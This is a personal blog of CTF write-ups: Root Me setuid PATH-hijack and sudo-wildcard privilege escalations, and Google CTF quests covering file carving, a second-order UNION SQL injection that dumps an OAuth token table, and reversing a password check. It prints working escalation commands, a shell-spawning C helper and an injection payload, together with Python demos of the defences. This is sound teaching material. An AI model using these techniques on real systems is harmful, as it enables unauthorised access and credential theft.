Saturday 6 October 2018

RootMe - CTF App Security - Bash - System 2

I am taking the CTF topic seriously: it is great fun, but I still have a lot to learn.

A good choice to start learning is


Root Me lets us practise on a lot of challenges, grouped into categories: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.

Let's start with the first category: App - Script.

The third challenge that we face is: Bash - System 2:

Vulnerability type:
  • Privilege Escalation by SETUID permission

##################################################

This challenge is very similar to Bash - System 1. Open a terminal and type:
  • ssh -p 2222 app-script-ch12@challenge02.root-me.org
to connect to the target system. When prompted for a password, enter app-script-ch12.

If we type ls -la, we see three files: ch12, ch12.c and .passwd. Note that ch12 and .passwd are owned by the same user, app-script-ch12-cracked.

It is easy to see that .passwd contains the solution of the challenge.

If we try to read .passwd with cat, less, more, etc., we get a permission error: only the owner of the file is allowed to READ it. What can we do?

We can exploit a "weakness" caused by the SETUID (Set User ID) bit. When this bit is set on an executable, the process runs with the effective user ID of the file's owner instead of the user who launched it, so we can make a program act with the owner's privileges even though we are not the owner.

SETUID is a permission that can be set on files, normally with chmod u+s filename or chmod 4755 filename. In the output of ls -l, the x in the owner's execute position is replaced by an s.

In our case we cannot chmod the file we are interested in, because we have no permissions on it, but we can look for files that already have the SETUID bit set. To list them, type:
  • find / -perm -u=s -type f 2>/dev/null
This searches the whole filesystem for regular files with the SETUID bit set (errors for unreadable directories are discarded). ch12 is one of them, so when we execute it the process runs as the owner of the program, which is also the owner of .passwd.

How does ch12 work? Read its source with less ch12.c: ch12 runs the command ls -lA on the .passwd file. We need to read that file instead. How?

One solution is to shadow the system's ls command with another command, or with a program of our own, named ls. For example, we can replace ls with nano, or write a small C program: when ch12 runs its code, the name ls will resolve to our program instead. To do this, type:
  • mkdir /tmp/challenge1 --> /tmp is one of the directories that grants all users read/write/execute permission, and we have no privileges anywhere else. We use it to hold the program that will replace ls.
  • cd /tmp/challenge1
Write the C program (program.c) like this:
#include <stdlib.h>
#include <stdio.h>

int main(void) {
    /* Runs as app-script-ch12-cracked when invoked through the setuid ch12 */
    system("cat /challenge/app-script/ch12/.passwd");
    /* Comment the line above and uncomment the next one if you want an
       interactive shell with app-script-ch12-cracked privileges instead */
    /* system("/bin/sh -i"); */
    return 0;
}
  • gcc -m32 -o program program.c --> -m32 is not required: our program runs as a separate process started by the shell that system() spawns, so a native 64-bit build works just as well.
  • mv program ls --> Rename program as ls
  • export PATH=/tmp/challenge1:$PATH --> Put our directory first in the search path
  • cd ~ --> Go back to the starting directory /challenge/app-script/ch12/
  • ./ch12
This way, when ch12 runs and reaches the following line of its code,

system("ls -lA /challenge/app-script/ch12/.passwd");

the shell spawned by system() looks up ls through the inherited PATH, finds our program first and runs it as app-script-ch12-cracked; the solution is printed on the terminal and we submit it as the password on the challenge webpage.

Note that we can replace ls with any Linux command, or write a script or program (e.g. in C), name it ls and put its location first in the PATH environment variable. This works because a setuid program inherits the caller's environment: in secure-execution mode the dynamic loader ignores or restricts a few variables such as LD_PRELOAD and LD_LIBRARY_PATH, but PATH is not among them, and system() runs the command through /bin/sh -c, which resolves a bare command name via PATH. This shows how dangerous such a program is: any user can escalate privileges and run commands as the program's owner (including root). A privileged program should call commands by absolute path and reset PATH (or the whole environment) before spawning anything.

Useful links:
http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

RootMe - CTF App Security - Sudo - Weak Configuration

Let's come back to the second challenge of



The second challenge that we face is: Sudo - Weak Configuration:

Vulnerability type:
  • Privilege Escalation by Sudo weak configuration

##################################################

In this challenge the current directory contains two directories, ch1 and ch1cracked, and one file, readme.md.
The readme.md file says that .passwd is located in /challenge/app-script/ch1/ch1cracked/.
If we try cd ch1cracked we get a permission error, so we cannot enter it. ls -la shows that only app-script-ch1-cracked can access that folder.

We need to check with sudo which commands, and on which paths, our user (app-script-ch1) is allowed to run as the app-script-ch1-cracked user.

To do this, we type:
  • sudo -l
and we get:
Matching Defaults entries for app-script-ch1 on challenge02:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,
    !mail_no_user
User app-script-ch1 may run the following commands on challenge02:
    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/*
Focus on the last two rows: our user can run cat as app-script-ch1-cracked on files under /challenge/app-script/ch1/ch1. Notice the * at the end: sudoers matches the command's arguments as a single space-joined string against this pattern, and in argument patterns * also matches / and spaces, so anything that starts with /challenge/app-script/ch1/ch1/ is accepted. We can therefore append ../ to climb out of that directory, or append a second, arbitrary path as a further argument.

To reach the ch1cracked folder and the .passwd file, type:
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/ ../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/shared_notes /challenge/app-script/ch1/ch1cracked/.passwd
In every case cat runs as the app-script-ch1-cracked user.
IMPORTANT: the first argument MUST be an absolute path beginning with /challenge/app-script/ch1/ch1/ (the allowed prefix before the *), otherwise sudo refuses the command. Any further argument, including the real path of .passwd, is covered by the wildcard.
In the second variant the allowed directory must end with '/', because the pattern requires a slash right after ch1/ch1: with "/challenge/app-script/ch1/ch1 ../ch1cracked/.passwd" a space would follow instead and the rule would not match. (The cd ch1 is not needed for the first and third variants, since their paths are absolute, but it matters for the second one: there cat resolves the relative path ../ch1cracked/.passwd from the current directory.)

When we enter the command, sudo asks for the password of app-script-ch1, so we type app-script-ch1 (the same one used for the SSH login at the start of the challenge).

We will get the solution.
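The following is an added example, not code from the challenge or from sudo: a simplified model of how a sudoers rule with a trailing wildcard is matched against a command line, to show why the three commands above are accepted and what a rule without the wildcard would reject. The assumption it rests on is that sudoers compares the space-joined argument string with the rule's argument pattern using fnmatch(3)-style globbing, in which * also matches / and spaces; everything else sudo does (user and host matching, path resolution, secure_path) is left out, and the test cases are constructed from the paths in this write-up.

```python
"""Added example: a reduced model of sudoers argument matching for the rule
    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/*
Assumption: the argument string is matched with fnmatch-style globbing where
`*` also matches `/` and spaces. This is a model, not sudo's own code."""
import fnmatch

# The weak rule shown by `sudo -l`
WEAK_RULE = ("/bin/cat", "/challenge/app-script/ch1/ch1/*")
# A tighter rule: one exact argument and no wildcard (file name from the write-up)
STRICT_RULE = ("/bin/cat", "/challenge/app-script/ch1/ch1/shared_notes")


def rule_allows(rule: tuple, command: str, args: list) -> bool:
    """True if (command, args) is accepted by the rule under the model above."""
    rule_cmd, rule_args = rule
    if command != rule_cmd:
        return False
    # sudoers matches the whole argument string, not each argument separately
    return fnmatch.fnmatchcase(" ".join(args), rule_args)


# Constructed cases: the three working command lines from the write-up, plus
# three that the rule rejects (no allowed prefix, missing slash, relative path).
CASES = {
    "dotdot":       ["/challenge/app-script/ch1/ch1/../ch1cracked/.passwd"],
    "dir_then_rel": ["/challenge/app-script/ch1/ch1/", "../ch1cracked/.passwd"],
    "two_files":    ["/challenge/app-script/ch1/ch1/shared_notes",
                     "/challenge/app-script/ch1/ch1cracked/.passwd"],
    "direct":       ["/challenge/app-script/ch1/ch1cracked/.passwd"],
    "no_slash":     ["/challenge/app-script/ch1/ch1", "../ch1cracked/.passwd"],
    "relative":     ["ch1/../ch1cracked/.passwd"],
}


def evaluate(rule: tuple) -> dict:
    """Map each case name to whether /bin/cat with those args passes the rule."""
    return {name: rule_allows(rule, "/bin/cat", args) for name, args in CASES.items()}


if __name__ == "__main__":
    for label, rule in (("weak", WEAK_RULE), ("strict", STRICT_RULE)):
        print(label, evaluate(rule))
```

Running it shows the first three cases accepted and the last three refused by the weak rule, and everything except the exact argument refused by the strict one. The lesson for whoever writes sudoers: a * after a directory path does not mean "files in this directory", it means "any string starting with this prefix", including ../ and extra arguments.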


RootMe - CTF App Security - Bash - System 1


The first challenge that we face is: Bash - System 1:

Vulnerability type:

  • Privilege Escalation by SETUID permission

##################################################

I am using Kali Linux. Open a terminal and type:
  • ssh -p 2222 app-script-ch11@challenge02.root-me.org
to connect to the target system. When prompted for a password, enter app-script-ch11.

If we type ls -la, we see three files: ch11, ch11.c and .passwd. Note that ch11 and .passwd are owned by the same user, app-script-ch11-cracked.

It is easy to see that .passwd contains the solution of the challenge.

If we try to read .passwd with cat, less, more, etc., we get a permission error: only the owner of the file is allowed to READ it. What can we do?

We can exploit a "weakness" caused by the SETUID (Set User ID) bit. When this bit is set on an executable, the process runs with the effective user ID of the file's owner instead of the user who launched it, so we can make a program act with the owner's privileges even though we are not the owner.

SETUID is a permission that can be set on files, normally with chmod u+s filename or chmod 4755 filename. In the output of ls -l, the x in the owner's execute position is replaced by an s.

In our case we cannot chmod the file we are interested in, because we have no permissions on it, but we can look for files that already have the SETUID bit set. To list them, type:
  • find / -perm -u=s -type f 2>/dev/null
This searches the whole filesystem for regular files with the SETUID bit set (errors for unreadable directories are discarded). ch11 is one of them, so when we execute it the process runs as the owner of the program, which is also the owner of .passwd.

How does ch11 work? Read its source with less ch11.c: ch11 runs the ls command on the .passwd file. We need to read that file instead. How?

One solution is to shadow the system's ls command with another command renamed ls. For example, we can replace ls with cat: when ch11 runs its code, the name ls will resolve to cat. To do this, type:
  • mkdir /tmp/challenge1 --> /tmp is one of the directories that grants all users read/write/execute permission, and we have no privileges anywhere else. We use it to hold the command that will replace ls.
  • which cat --> Tells us where the cat binary is located. It will be /bin/cat.
  • cp /bin/cat /tmp/challenge1 && cd /tmp/challenge1 --> Use && (or two separate commands), not a pipe: a cd inside a pipeline runs in a subshell and the directory change is lost.
  • mv cat ls --> Rename cat as ls
  • export PATH=/tmp/challenge1:$PATH --> Put our directory first in the search path
  • cd ~ --> Go back to the starting directory /challenge/app-script/ch11/
  • ./ch11
This way, when ch11 runs and reaches the following line of its code,

system("ls /challenge/app-script/ch11/.passwd");

the shell spawned by system() looks up ls through PATH and finds our copy of cat first, so the solution is printed on the terminal and we submit it as the password on the challenge webpage.

Note that we can replace ls with any Linux command, or write a script or program (e.g. in C), name it ls and put its location first in the PATH environment variable. This shows how dangerous such a program is: it allows any user to escalate privileges and run commands as other users (including root).
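The following is an added example for both the Bash - System 1 and Bash - System 2 write-ups; it is not the challenge's code. It shows the mechanism behind both solutions, a command launched through system() being resolved via the caller's PATH, and the simplest fix on the program's side, resetting PATH before spawning anything. It runs as the current user, without any setuid bit: the lookup works the same way, only the identity the fake ls would run under differs. The fake ls just prints a marker instead of reading .passwd, and the assumption that the real ls lives in /usr/bin or /bin is labelled in the code.

```python
"""Added example: PATH hijack of a command spawned through system(), and the
fixed-PATH defence. Not the challenge's code; runs without setuid."""
import os
import subprocess
import tempfile

SAFE_PATH = "/usr/bin:/bin"   # assumption: the real ls lives in one of these


def make_hijack_dir() -> str:
    """A writable directory holding a fake `ls` (the role of /tmp/challenge1)."""
    hijack_dir = tempfile.mkdtemp(prefix="hijack-")
    fake_ls = os.path.join(hijack_dir, "ls")
    with open(fake_ls, "w") as f:
        # In the challenge this would be `cat /challenge/app-script/ch12/.passwd`;
        # a marker is enough here to show which program actually ran.
        f.write("#!/bin/sh\necho HIJACKED\n")
    os.chmod(fake_ls, 0o755)
    return hijack_dir


def run_like_system(command: str, path: str) -> str:
    """Mimic libc system(): /bin/sh -c <command>, with PATH chosen by the caller."""
    done = subprocess.run(["/bin/sh", "-c", command], env={"PATH": path},
                          capture_output=True, text=True)
    return done.stdout.strip()


def victim_output(target: str, path: str) -> str:
    """The challenge binary's call, system("ls -lA <target>"), as the child shell sees it."""
    return run_like_system("ls -lA " + target, path)


def demo() -> dict:
    hijack_dir = make_hijack_dir()
    target = os.path.join(hijack_dir, "ls")   # any existing file works as the argument
    # PATH as exported in the write-up: our directory first, then the original PATH
    hijacked = victim_output(target, hijack_dir + ":" + SAFE_PATH)
    # PATH as a careful privileged program would set it before calling system()
    safe = victim_output(target, SAFE_PATH)
    return {"hijacked": hijacked, "safe": safe}


if __name__ == "__main__":
    for name, output in demo().items():
        print(name, "->", output)
```

With the attacker's directory first in PATH the victim prints HIJACKED; with a fixed PATH it prints the real ls -lA line. On the challenge host the only difference is that the process is setuid, so the fake ls runs as the file owner; the bare command name in system() is the bug, and absolute paths plus a controlled environment are the fix.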

Useful links:
http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

Sunday 9 September 2018

Deal with it - Boot Kali Linux from USB THE RIGHT WAY! (Bye bye "CD-ROM couldn't be mounted")

Yesterday I was installing the new version of Kali Linux, 2018.3 (yep, we are already at the end of 2018... and I'm getting old), from USB.

While I was happily installing it, the installer stopped with the following error:


Oh no! And now?
Ok...

To solve this problem, I suggest using Rufus (https://rufus.akeo.ie/) to create the bootable USB drive, in this case for Kali Linux (the other tools I tried did not work for me).

Simply download the latest version of Rufus (I took the portable version, no particular reason), insert your USB key into your machine and start Rufus.


The only way to read every word is to set the image size to extra-large, but I prefer the large size :(. Anyway, fill in the fields like this:


Then click START. You will get this window:


IT IS VITAL that you pick the SECOND option (already selected for you in the image, "thank you", you're welcome): "Write in DD image mode".

Rufus offers to write the Kali Linux ISO in DD image mode because the Kali Linux ISO is an isohybrid image, meant to be copied byte for byte onto the USB key rather than unpacked onto it.

Then click OK, wait (it takes a while) and try your bootable USB: the Kali Linux installation should now go through without the CD-ROM error.

Ehm, sorry, wrong blog post. What I meant to say is: now I'm off to buy a


The Extra-large size is mandatory :-Q

Enjoy your food ^^

Saturday 8 September 2018

Beginners Quest (Google CTF) - 7th - Floppy

Today is a Saturday. Wow, weekend.

I want to continue our journey




Used tools:
  • binwalk
The state of the art is


And the beginners quest of today is


As always, download the attachment, check the file type, rename it and extract the content:
  • file 4e69382f661878c7da8f8b6b8bf73a20acd6f04ec253020100dfedbd5083bb39
It is a zip file.
  • mv 4e69382f661878c7da8f8b6b8bf73a20acd6f04ec253020100dfedbd5083bb39 floppy.zip
  • unzip floppy.zip
The content is composed of one file called foo.ico. If we type:
  • file foo.ico
we get:
foo.ico: MS Windows icon resource - 1 icon, 32x32, 16 colors

This is clearly a steganography quest: we need to extract whatever is hidden inside this .ico file. Let's type:
  • strings foo.ico
and among the strings we find hints that a file called driver.txt is probably hidden inside.

Use binwalk to extract the embedded files from foo.ico:
  • binwalk -e foo.ico
If we type ls, we see a folder called _foo.ico.extracted; enter it and you will find 3 files: driver.txt, www.com and 2FD.zip.

Just open driver.txt and you get the solution key.
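The following is an added example, not part of the original post and not binwalk's code: a minimal version of what binwalk -e does here, scanning a blob for the ZIP local-file-header signature and carving the archive found at that offset. binwalk knows hundreds of signatures; this shows the idea with one. The input is constructed inline (a bare ICONDIR/ICONDIRENTRY header, a 16-byte stand-in for the pixel data, and an appended zip holding a driver.txt with made-up content); it is not the challenge's foo.ico.

```python
"""Added example: signature scan plus carve, the idea behind `binwalk -e`.
The .ico blob is constructed here; it is not the challenge's foo.ico."""
import io
import struct
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"      # magic bytes of a zip local file header
DRIVER_TXT = b"constructed driver.txt content, not the real key\n"


def build_sample_ico() -> bytes:
    """Constructed input: a plausible 32x32 16-colour ICO header, a pixel stub, then a zip."""
    icondir = struct.pack("<HHH", 0, 1, 1)               # reserved, type=1 (icon), count=1
    pixel_stub = b"\x00" * 16                            # stand-in for the image data
    entry = struct.pack("<BBBBHHII", 32, 32, 16, 0, 1, 4,
                        len(pixel_stub), 6 + 16)         # w, h, colours, reserved, planes, bpp, size, offset
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("driver.txt", DRIVER_TXT)
    return icondir + entry + pixel_stub + zbuf.getvalue()


def find_signature_offsets(blob: bytes, signature: bytes = ZIP_LOCAL_HEADER) -> list:
    """Every offset at which the signature occurs (a signature scan reduced to one magic)."""
    offsets, start = [], 0
    while (pos := blob.find(signature, start)) != -1:
        offsets.append(pos)
        start = pos + 1
    return offsets


def carve_zip(blob: bytes, offset: int) -> dict:
    """Treat the bytes from `offset` onward as a zip archive and return {name: content}."""
    with zipfile.ZipFile(io.BytesIO(blob[offset:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def extract_hidden_files(blob: bytes) -> dict:
    """Carve an archive at the first signature hit, as the -e extraction step would."""
    offsets = find_signature_offsets(blob)
    if not offsets:
        return {}
    return carve_zip(blob, offsets[0])


if __name__ == "__main__":
    ico = build_sample_ico()
    print("zip signature at offsets:", find_signature_offsets(ico))
    for name, data in extract_hidden_files(ico).items():
        print(name, "->", data.decode())
```

The icon header is 6 + 16 bytes and the pixel stub another 16, so the zip signature turns up at offset 38, and carving from there yields driver.txt. On a real sample a signature hit can be a false positive (the four bytes can occur inside compressed data), which is why carving must be validated by actually parsing the archive, as carve_zip does.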

At this point, our path will be




Saturday 25 August 2018

Beginners Quest (Google CTF) - 6th - Media-DB

Good afternoon! (this time it really is afternoon)

QUICK ONE, NO LONG EXPLANATIONS!

Used techniques:
  • SQL Injection with UNION statement










As always, download the attachment, check the file type, rename it and extract the content:
  • file 2b6cfe9b17556d78cd7142e39400f9bf711f98eefb6332811088bd11a9665523
It is a zip file.
  • mv 2b6cfe9b17556d78cd7142e39400f9bf711f98eefb6332811088bd11a9665523 mediadb.zip
  • unzip mediadb.zip
The content is one Python file, media-db.py, with the code of the application listening at media-db.ctfcompetition.com on port 1337.

First, type:
  • nc media-db.ctfcompetition.com 1337
The application starts; play with it to see how it works.
Then open media-db.py and analyse it. It becomes clear that this quest can be solved with SQL injection. The application creates 2 tables: oauth_tokens (with 1 column, oauth_token) and media (2 columns, artist and song). It offers 4 options:
  1. Add song: every " character is removed from the artist and song strings, then the option executes:

    """INSERT INTO media VALUES ("{}", "{}")""".format(artist, song)
  2. Play artist: if the given artist name exists in the DB, the application shows the artist and the song. It executes:

    "SELECT artist, song FROM media WHERE artist = '{}'".format(artist)
  3. Play song: if the given song name exists in the DB, the application shows the artist and the song. It executes:

    "SELECT artist, song FROM media WHERE song = '{}'".format(song)
  4. Shuffle artist: picks a random artist from the DB and prints that artist's songs, executing:

    "SELECT artist, song FROM media WHERE artist = '{}'".format(artist)
Looking at these options, the strategy is: options 2, 3 and 4 build their query by formatting a value between single quotes, so we can try to smuggle SQL in through option 1. A good method is to enter an artist name followed by a ' character, which closes the quoted value in the WHERE clause, and then continue with SQL of our own.
BUT there is a problem: options 2 and 3 filter the ' character (if we enter artistname', the ' is removed; look at the .py file), while option 4 has no such check, because the artist it formats comes straight from the database. So we store the payload with option 1 and let option 4 execute it (a second-order injection).
As said before, we have 2 tables, media and oauth_tokens. So the plan is: insert an artist name, close the WHERE value with ', then continue the query with UNION SELECT, which lets us select columns from the same table or from another table of the DB; we use it to read the interesting column of oauth_tokens, presumably the table holding the OAuth token mentioned in the quest text. Finally we end the injected part with -- so that everything after it (the closing ' added by the application) is treated as a comment.

One note: with UNION, the SELECT before it and the SELECT after it must return the same number of columns. In our case, reading the code, the first SELECT has two columns, artist and song, so the SELECT after the UNION must also have two.

You can practise the SQL syntax on this website: https://kripken.github.io/sql.js/GUI/

Ok, so...
  • nc media-db.ctfcompetition.com 1337
  • Select 1
  • As artist enter: anycakeyouwant' UNION SELECT oauth_token, 2 FROM oauth_tokens -- (the second column of the second SELECT can be any number or a "string" in double quotes, but here a "string" does not work, because option 1 removes every " character from the artist and song names, so use a number)
  • As song enter: whatyouwant
  • Select 4
This way, the statement executed by the SQL engine will be:

SELECT artist, song FROM media WHERE artist = 'anycakeyouwant' UNION SELECT oauth_token, 2 FROM oauth_tokens --'

so the query also returns the content of the oauth_tokens table, which holds the solution key.
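The following is an added example, not the challenge's media-db.py: a reduced model of the application on sqlite3 that reproduces the stored payload, the vulnerable shuffle query, the column-count rule for UNION, and the parameterised fix. The token value and the table rows are constructed; the real option 4 picks a random artist, so here shuffle_artist takes the artist as an argument to keep the run deterministic, and the model stores the payload with a bound parameter (the real app formats it into a double-quoted literal, which is why it strips " and why the payload uses a number as the second column).

```python
"""Added example: second-order UNION injection through the shuffle query of a
media-db-like app, beside the parameterised fix. Constructed data; not the
challenge's code."""
import sqlite3

TOKEN = "CTF{constructed-token-not-the-real-flag}"   # constructed
PAYLOAD = "anycakeyouwant' UNION SELECT oauth_token, 2 FROM oauth_tokens --"


def build_db() -> sqlite3.Connection:
    """Schema from the write-up; rows are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE oauth_tokens (oauth_token TEXT)")
    conn.execute("CREATE TABLE media (artist TEXT, song TEXT)")
    conn.execute("INSERT INTO oauth_tokens VALUES (?)", (TOKEN,))
    conn.execute("INSERT INTO media VALUES (?, ?)", ("Kraftwerk", "Autobahn"))
    return conn


def add_song(conn, artist: str, song: str) -> None:
    """Option 1: strips double quotes, leaves single quotes alone, stores the strings."""
    artist, song = artist.replace('"', ""), song.replace('"', "")
    conn.execute("INSERT INTO media VALUES (?, ?)", (artist, song))


def shuffle_artist_vulnerable(conn, artist: str):
    """Option 4 as in the app: the artist read back from the DB is formatted
    straight into the query, so a stored payload becomes SQL here."""
    query = "SELECT artist, song FROM media WHERE artist = '{}'".format(artist)
    return conn.execute(query).fetchall()


def shuffle_artist_fixed(conn, artist: str):
    """Same query with a bound parameter: the payload stays a plain string."""
    return conn.execute(
        "SELECT artist, song FROM media WHERE artist = ?", (artist,)).fetchall()


def union_column_mismatch_is_rejected(conn) -> bool:
    """Why the payload needs ', 2': a one-column UNION against two columns fails."""
    bad = ("SELECT artist, song FROM media WHERE artist = 'x' "
           "UNION SELECT oauth_token FROM oauth_tokens")
    try:
        conn.execute(bad).fetchall()
        return False
    except sqlite3.OperationalError:
        return True


def demo() -> dict:
    conn = build_db()
    add_song(conn, PAYLOAD, "whatyouwant")
    # "Shuffle" lands on the artist we stored
    stored_artist = conn.execute(
        "SELECT artist FROM media WHERE song = ?", ("whatyouwant",)).fetchone()[0]
    return {
        "leaked": shuffle_artist_vulnerable(conn, stored_artist),
        "fixed": shuffle_artist_fixed(conn, stored_artist),
        "mismatch_rejected": union_column_mismatch_is_rejected(conn),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The vulnerable shuffle returns the token row (the first SELECT matches nothing, the UNION supplies the token and the literal 2); the parameterised version returns the stored row with the payload as a harmless artist name. Filtering quotes at the input, as options 2 and 3 do, does not help once a value can reach a query by another route; binding parameters at every query does.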

And also this time MY WORK IS DONE!



Friday 24 August 2018

Beginners Quest (Google CTF) - 5th - Gatekeeper

Again, the same sad day.

https://capturetheflag.withgoogle.com

Used commands/tools:
  • strings
  • Hopper Disassembler
  • ltrace
The AS-IS is


Let's continue our JOURNEY



As always, download the attachment, check the file type, rename it and extract the content:
  • file f7e577b61f5b98aa3c0e453e83c60729f6ce3ef15c59fc76d64490377f5a0b5b
It is a zip file.
  • mv f7e577b61f5b98aa3c0e453e83c60729f6ce3ef15c59fc76d64490377f5a0b5b gatekeeper.zip
  • unzip gatekeeper.zip
The content is composed of one file called gatekeeper. If we type:
  • file gatekeeper
we get:

gatekeeper: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a89(and other digits), not stripped

This file is an executable, so we give it execute permission:
  • chmod +x gatekeeper
Run this file:
  • ./gatekeeper
It asks for username and password as arguments like:
  • ./gatekeeper user passadmin
We get a "wrong username" message, so the program tells us whether it is the username or the password that is wrong.
If we look at the printable strings inside the file with:
  • strings gatekeeper
we see several strings and can guess that the username is 0n3_W4rM and the password is zLl1ks_d4m_T0g_I. If we submit these credentials, the username is accepted but the password is not. The strings command shows nothing else useful.
At this point it is clear that the quest has to be solved by disassembling gatekeeper.
We can use a disassembler such as Hopper Disassembler, which you can download from https://www.hopperapp.com. After installing it, open it with:
  • /opt/hopper-v4/bin/Hopper
This is a demo version with some limitations, e.g. a session lasts 30 minutes. When the program opens, click Try the Demo, then File->Read Executable to Disassemble... and select the gatekeeper file; in the window that appears select ELF as the loader and click OK. On the left, click the Strs tab, which lists the strings found in the file. Select the username 0n3_W4rM and the view jumps to address 0000000000000de0, which contains:

db                 "0n3_W4rM", 0                          ; DATA_XREF=main+133

Now double-click on main+133 to jump to address 0000000000000a3c, which contains the following assembly code:

lea                rsi, qword [a0n3W4rM]              ;  argument "__s2" for method j_strcmp, "0n3_W4rm"

From this line we can open the pseudocode by selecting it and pressing ALT+ENTER, or via the menu Window->Show Pseudo Code of Procedure. The pseudocode shows how the interesting part works: the username 0n3_W4rM is compared directly, while the second argument goes through some processing before it reaches the strcmp with zLl1ks_d4m_T0g_I.

To be sure how the program works, we can run it under ltrace, which traces the library calls the executable makes.

If ltrace is not installed on your machine (as on Kali Linux), the current release may fail to build and install because of several problems that show up during compilation, so here is how I fixed it (again, I am on Kali Linux). First download ltrace from https://www.ltrace.org/, extract the archive, enter the folder and type:
  • ./configure
  • gedit sysdeps/linux-gnu/proc.c
In proc.c search for readdir_r and replace readdir_r(...) with readdir(d), since the former is deprecated; then delete (or comment out) the declarations of the entry and *result variables, and replace the variable result, where it is used, with readdir(d) (there should be three places). Save the file and close gedit. Then type:
  • gedit value.c
Here comment out or delete the declaration typedef char assert__long_enough_long. Save and close. Then type:
  • gedit lens_default.c
Here too comment out or delete the declaration typedef char assert__long_enough_long. Save and close. Then type:
  • gedit ltrace-elf.c
Go to line 221 and replace if(!need_data(...) < 0 ) with if(!(need_data(...)) != 0). Save and close. Finally type:
  • make
  • make install
When the process ends, ltrace is installed and can be called from any directory.

Now go back to the gatekeeper folder.
With ltrace we will use grep to keep only the lines containing strcmp, to check the call where our second argument is compared with zLl1ks_d4m_T0g_I (as seen in the pseudocode):
  • ltrace ./gatekeeper 0n3_W4rM randompassword
we can look from the output that on strcmp, zLl1ks_d4m_T0g_I is compared with the backward version of randompassword that is drowssapmodnar. To filter this evidence you can type:
  • ltrace ./gatekeeper 0n3_W4rM randompassword 2>&1 | grep "strcmp"
and you can see clearly strcmp("drowssapmodnar", "zLl1ks_d4m_T0g_I"). It means that the right password to insert is the backward version of zLl1ks_d4m_T0g_I that is I_g0T_m4d_sk1lLz. Finally we can execute the gatekeeper program by typing:
  • ./gatekeeper 0n3_W4rM I_g0T_m4d_sk1lLz
This time the application accepts the password too and prints the solution key.

IT IS THE END!

